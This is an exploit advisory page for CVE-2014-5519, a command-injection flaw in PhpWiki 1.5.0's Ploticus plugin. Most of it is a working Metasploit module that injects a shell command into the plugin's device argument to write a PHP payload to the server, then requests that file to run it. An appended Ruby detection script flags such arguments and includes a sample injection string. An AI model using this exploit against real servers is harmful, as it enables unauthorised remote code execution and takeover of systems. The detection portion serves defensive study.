Phpwiki Ploticus Remote Code Execution

2014.09.17
Credit: us3r777
Risk: High
Local: No
Remote: Yes
CWE: N/A


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Phpwiki Ploticus Remote Code Execution',
      'Description'    => %q{
        The Ploticus module in PhpWiki 1.5.0 allows remote attackers to execute arbitrary
        code via command injection.
      },
      'Author'         =>
        [
          'Benjamin Harris', # Discovery and POC
          'us3r777 <us3r777[at]n0b0.so>' # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2014-5519' ],
          [ 'OSVDB', '110576' ],
          [ 'EDB', '34451'],
          [ 'URL', 'https://sourceforge.net/p/phpwiki/code/8974/?page=1' ], # This commit prevents exploitation
          [ 'URL', 'http://seclists.org/fulldisclosure/2014/Aug/77' ] # The day the vuln went public
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Sep 11 2014'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to phpwiki', '/phpwiki']),
      ], self.class)
  end

  def exploit
    uri = target_uri.path

    payload_name = "#{rand_text_alpha(8)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    res = send_request_cgi({
      'uri'       => normalize_uri(uri + '/index.php/HeIp'),
      'method'    => 'POST',
      'vars_post' =>
        {
          'pagename'      => 'HeIp',
          'edit[content]' => "<<Ploticus device=\";echo '#{php_payload}' > #{payload_name};\" -prefab= -csmap= data= alt= help= >>",
          'edit[preview]' => 'Preview',
          'action'        => 'edit'
        }
    })

    if not res or res.code != 200
      fail_with(Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    upload_uri = normalize_uri(uri + "/" + payload_name)
    print_status("#{peer} - Executing payload #{payload_name}")
    send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end
end
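
For detection, the request above is recognisable by a Ploticus plugin argument that carries shell metacharacters. The following check is an added example, not part of the original module or of PhpWiki: it parses the already URL-decoded `edit[content]` field of an edit/preview request and returns the offending arguments. The function names, the metacharacter set and the sample strings are assumptions made for illustration.

```ruby
require 'strscan'

# Characters a shell would interpret. Assumption of this example: no
# legitimate Ploticus plugin argument value needs any of them.
SHELL_META = /[;&|`$<>(){}\\'"\n]/

# Return one {key => value} hash per <<Ploticus ...>> plugin call found in
# the wiki markup. Quoted values may contain spaces and '>' characters, so
# the arguments are tokenised instead of matched with a single regex.
def ploticus_args(content)
  calls = []
  s = StringScanner.new(content)
  while s.skip_until(/<<\s*Ploticus\b/i)
    args = {}
    until s.eos?
      s.skip(/\s+/)
      break if s.skip(/>>/)           # end of this plugin call
      if s.scan(/([-\w]+)=/)
        key = s[1]
        # A quoted value is taken whole; otherwise read up to whitespace or '>'.
        quoted = s.scan(/"(?:[^"\\]|\\.)*"/)
        args[key] = quoted ? quoted[1..-2] : s.scan(/[^\s>]*/)
      else
        s.getch                       # stray character, keep scanning
      end
    end
    calls << args
  end
  calls
end

# Return [key, value] pairs whose value contains a shell metacharacter.
def suspicious_ploticus_args(content)
  ploticus_args(content).flat_map do |args|
    args.select { |_key, value| value.match?(SHELL_META) }.to_a
  end
end

# Constructed samples: one ordinary plugin call, one with the argument
# shape used by the module above (harmless marker instead of a payload).
BENIGN  = '<<Ploticus device="png" alt="Sales chart">>'
HOSTILE = '<<Ploticus device=";echo CONSTRUCTED;" -prefab= -csmap= data= alt= help= >>'

if __FILE__ == $PROGRAM_NAME
  [BENIGN, HOSTILE].each { |c| p suspicious_ploticus_args(c) }
end
```

A hit on a request with `action=edit` and `edit[preview]` set is worth alerting on even when the page is never saved, since the module only previews the content. The fix itself is the PhpWiki commit listed in the references.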

References:

http://cxsecurity.com/issue/WLB-2014080135
https://sourceforge.net/p/phpwiki/code/8974/?page=1

